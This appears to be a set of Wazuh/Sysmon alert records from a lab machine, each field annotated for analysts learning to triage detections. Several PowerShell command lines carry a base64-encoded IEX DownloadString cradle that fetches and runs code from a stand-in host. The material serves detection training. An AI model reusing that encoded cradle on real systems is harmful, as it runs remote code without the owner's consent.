data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:40:15.104
ProcessGuid: {94294ddc-bdcd-680a-c90b-000000000e00}
ProcessId: 16908
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_apqxmac4.3kk.ps1
CreationUtcTime: 2025-04-24 22:40:15.104
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:40:15.104 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdcd-680a-c90b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 16908 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_apqxmac4.3kk.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:40:15.104 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 104 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534417.2017814 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:40:14.9148096Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285823 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:40:13.227
ProcessGuid: {94294ddc-bdcd-680a-c90b-000000000e00}
ProcessId: 16908
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bdca-680a-c70b-000000000e00}
ParentProcessId: 16772
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:40:13.227 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdcd-680a-c90b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 16908 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bdca-680a-c70b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 16772 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Software protection service scheduled successfully. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 60642 Numeric ID of the detection rule that fired.
rule.firedtimes: 10 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_application'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534418.2025885 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-SPP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Software Protection Platform Service No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 16384 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x80000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:40:16.4499482Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2413 Incremental log record number – handy for timeline order.
data.win.system.processID: 11688 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Application No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Successfully scheduled Software Protection service for re-start at 2025-04-25T22:31:16Z. Reason: RulesEngine." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.data: 2025-04-25T22:31:16Z, RulesEngine No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 105 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534420.2027467 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:40:17.7648571Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285865 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:40:16.281
ProcessGuid: {94294ddc-bdd0-680a-cb0b-000000000e00}
ProcessId: 17072
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bdcd-680a-c90b-000000000e00}
ParentProcessId: 16908
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:40:16.281 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdd0-680a-cb0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 17072 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bdcd-680a-c90b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 16908 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 109 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534420.2035538 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:40:17.9638197Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285866 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:40:17.951
ProcessGuid: {94294ddc-bdd0-680a-cb0b-000000000e00}
ProcessId: 17072
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_elucagk5.b0x.ps1
CreationUtcTime: 2025-04-24 22:40:17.951
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:40:17.951 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdd0-680a-cb0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 17072 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_elucagk5.b0x.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:40:17.951 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 106 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534423.2038307 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:40:20.4605101Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285884 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:40:19.211
ProcessGuid: {94294ddc-bdd3-680a-cd0b-000000000e00}
ProcessId: 17212
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
